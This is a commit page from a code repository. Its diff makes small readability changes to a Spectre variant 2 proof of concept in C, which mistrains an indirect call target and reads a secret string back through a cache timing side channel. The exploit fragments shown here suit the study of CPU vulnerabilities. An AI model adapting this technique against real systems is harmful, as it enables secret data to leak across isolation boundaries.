sk4nz/octopus
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Typos, change variable name for readability

Browse Source
This commit is contained in:
Samuel Aubertin 2022-04-05 12:44:24 +02:00
parent 5804d30227
commit 8dbe117cb0
1 changed files with 12 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
spectre_v2.c
View File

@ -26,7 +26,7 @@ char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism,
uint64_t* target; // pointer to indirect call target uint64_t* target; // pointer to indirect call target
unsigned int cache_hit_threshold, array1_size = 16; unsigned int cache_hit_threshold, array1_size = 16;
uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 }; uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */ //uint8_t temp = 0; /* Used so compiler wont optimize out victim_function() */
uint8_t channel[256 * GAP]; // side channel to extract secret phrase uint8_t channel[256 * GAP]; // side channel to extract secret phrase
// mistrained target of indirect call // mistrained target of indirect call
@ -64,7 +64,7 @@ victim_function(char* addr, int input)
"callq *%1\n" "callq *%1\n"
"mov %0, %%eax\n" "mov %0, %%eax\n"
: "=r" (result) : "=r" (result)
: "r" (*target), "r" (addr) : "r" (*target), "rm" (addr)
: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11"); : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
return result & junk; return result & junk;
} }
@ -87,6 +87,7 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
channel[i * GAP] = 1; channel[i * GAP] = 1;
} }
for (tries = 999; tries > 0; tries--) { for (tries = 999; tries > 0; tries--) {
// Malicious target
*target = (uint64_t)&gadget; *target = (uint64_t)&gadget;
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
@ -94,7 +95,6 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
for (j = 50; j > 0; j--) { for (j = 50; j > 0; j--) {
junk ^= victim_function(&dummy, 0); junk ^= victim_function(&dummy, 0);
} }
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
#endif #endif
@ -130,6 +130,8 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
_mm_mfence(); _mm_mfence();
#endif #endif
// call victim // call victim
//printf("victim with %p\n", target_addr);
junk ^= victim_function(target_addr, 0); junk ^= victim_function(target_addr, 0);
#ifndef NOMFENCE #ifndef NOMFENCE
_mm_mfence(); _mm_mfence();
@ -165,7 +167,7 @@ main(int argc, char** argv)
{ {
int o, score[2], len = (int)strlen(secret), json = 0, successes = 0; int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
uint8_t value[2]; uint8_t value[2];
char* addr = secret; char* secret_addr = secret;
while ((o = getopt(argc, argv, "t:j")) != EOF) { while ((o = getopt(argc, argv, "t:j")) != EOF) {
switch (o) { switch (o) {
@ -197,7 +199,7 @@ main(int argc, char** argv)
} }
#endif #endif
while (--len >= 0) { while (--len >= 0) {
leak(addr++, value, score, cache_hit_threshold); leak(secret_addr++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) { if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
successes++; successes++;
fprintf(stderr, "\033[32m%c\033[0m", (value[0])); fprintf(stderr, "\033[32m%c\033[0m", (value[0]));